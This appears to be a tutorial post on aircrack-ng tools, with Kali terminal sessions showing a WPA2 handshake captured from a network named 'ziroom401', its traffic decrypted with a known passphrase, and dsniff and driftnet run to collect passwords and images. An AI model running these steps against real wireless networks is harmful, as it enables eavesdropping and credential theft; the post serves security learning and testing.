  • Wireless Penetration (8): AIRCRACK-NG SUITE

    AIRDECAP-NG
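    Strip the 802.11 headers
    airdecap-ng -b <AP MAC> 1.pcap
    Decrypt WEP-encrypted data
    airdecap-ng -w <WEP key> -b <AP MAC> 1.pcap
    An association with the AP must have been established
    Decrypt WPA-encrypted data
    airdecap-ng -e kifi -p <PSK> -b <AP MAC> 1.pcap
    The capture file must contain the four-way handshake; otherwise decryption is impossible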
    root@kali:~# service network-manager stop
    root@kali:~# airmon-ng check kill
    Killing these processes:
    PID Name
    875 wpa_supplicant
    1580 dhclient
    root@kali:~# airmon-ng start wlan2
    No interfering processes found
    PHY Interface Driver Chipset
    phy0 wlan2 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
    (mac80211 monitor mode vif enabled for [phy0]wlan2 on [phy0]wlan2mon)
    (mac80211 station mode vif disabled for [phy0]wlan2)
    root@kali:~# airodump-ng wlan0mon
    CH 1 ][ Elapsed: 18 s ][ 2019-03-09 05:20
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    D8:B0:4C:C3:25:E0 -68 7 0 0 11 65 WPA2 CCMP PSK <length
    D4:EE:07:67:22:90 -75 9 2 0 8 270 WPA2 CCMP PSK ziroom4
    D0:76:E7:51:2A:78 -83 7 0 0 1 270 WPA2 CCMP PSK ziroom5
    40:31:3C:FD:BE:D2 -86 5 0 0 1 130 WPA2 CCMP PSK Xiaomi_
    BSSID STATION PWR Rate Lost Frames Probe
    D4:EE:07:67:22:90 20:16:B9:33:38:F3 -1 2e- 0 0 2
    root@kali:~# airodump-ng wlan0mon --bssid D4:EE:07:67:22:90 -c 8 -w TP-01
    CH 8 ][ Elapsed: 2 mins ][ 2019-03-09 05:25 ][ WPA handshake: D4:EE:07:67:22:90
    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESS
    D4:EE:07:67:22:90 -69 2 1123 13256 172 8 270 WPA2 CCMP PSK zir
    BSSID STATION PWR Rate Lost Frames Probe
    D4:EE:07:67:22:90 70:8A:09:9A:01:C4 -1 2e- 0 0 6
    D4:EE:07:67:22:90 A4:50:46:E0:FA:06 -28 0e- 1e 2 13189
    D4:EE:07:67:22:90 20:16:B9:33:38:F3 -32 2e- 6e 0 196
    D4:EE:07:67:22:90 DC:F0:90:8B:A1:A6 -62 0e- 6 0 31
    D4:EE:07:67:22:90 D4:A1:48:4B:96:F6 -84 2e- 6 0 17
    D4:EE:07:67:22:90 5C:F5:DA:E2:35:A6 -90 2e- 1 0 5
    root@kali:~# wireshark tp-01.cap
    Filter out the packets
    root@kali:~# airdecap-ng -e ziroom401 -b D4:EE:07:67:22:90 -p ziroomer TP-01-02.cap
    Total number of stations seen 7
    Total number of packets read 42483
    Total number of WEP data packets 0
    Total number of WPA data packets 12119
    Number of plaintext data packets 0
    Number of decrypted WEP packets 0
    Number of corrupted WEP packets 0
    Number of decrypted WPA packets 12019
    Number of bad TKIP (WPA) packets 0
    Number of bad CCMP (WPA) packets 0
    # Decryption generates a dec.cap file in the current directory
    TP-01-02-dec.cap
    root@kali:~# wireshark TP-01-02-dec.cap
    The 802.11 packets were decrypted successfully, and the plaintext can be viewed
    AIRSERV-NG
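    Serves a wireless card over the network
    Some wireless cards do not support client/server mode
    Start wireless monitoring
    Server side
    airserv-ng -p 3333 -d wlan2mon
    Client side
    airodump-ng 192.168.1.1:3333
    Some firewalls interfere with communication between the client and the server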
    root@kali:~# airserv-ng -p 3333 -d wlan0mon
    Opening card wlan0mon
    Setting chan 1
    Opening sock port 3333
    Serving wlan0mon chan 1 on port 3333
    root@kali:~# netstat -pantu | grep 3333
    tcp 0 0 0.0.0.0:3333 0.0.0.0:* LISTEN 16702/airserv-ng
    root@kali:~# airodump-ng 127.0.0.1:3333
    AIRTUN-NG
    Wireless intrusion detection (wIDS)
    Wireless password and BSSID
    The handshake must be captured
    Relay and replay
    Repeat/Replay
    AIRTUN-NG
    wIDS
    WEP: airtun-ng -a <AP MAC> -w SKA wlan2mon
    WPA: airtun-ng -a <AP MAC> -p PSK -e kifi wlan2mon
    ifconfig at0 up
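    Four-way handshake
    In theory wIDS supports multiple APs, but reliability drops with more than 2 APs
    WPA: airtun-ng -a <AP MAC> -p PSK -e kifi1 wlan2mon
    ifconfig at1 up
    When multiple APs are on different channels: airodump-ng -c 1,11 wlan2mon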
    root@kali:~# airtun-ng -a D4:EE:07:67:22:90 -p ziroomer002 -e ziroom401 wlan0mon
    created tap interface at0
    WPA encryption specified. Sending and receiving frames through wlan0mon.
    FromDS bit set in all frames.
    root@kali:~# ifconfig -a  # at0
    root@kali:~# ifconfig at0 up
    root@kali:~# airodump-ng wlan0mon --bssid 14:75:90:21:4F:56 -c 6
    root@kali:~# driftnet -i at0  # capture image data
    root@kali:~# dsniff -i at0  # capture account and password information
    root@VB:~# tcpreplay -ieth1 -M1000 ids.pcap
    Sending out eth1
    processing file: ids.pcap
    Actual: 8497 packets (4090599 bytes) sent in 1.87 seconds
    Rated: 2187486.0 bps, 16.96 Mbps, 4543.85 pps
    Statistics for network device: eth1
    Attempted packets: 8487
    Successful packets: 8497
    Failed packets: 0
    Retried packets (ENOBUFS): 0
    Retried packets (EAGAIN): 0
  • Original article: https://www.cnblogs.com/micr067/p/12519786.html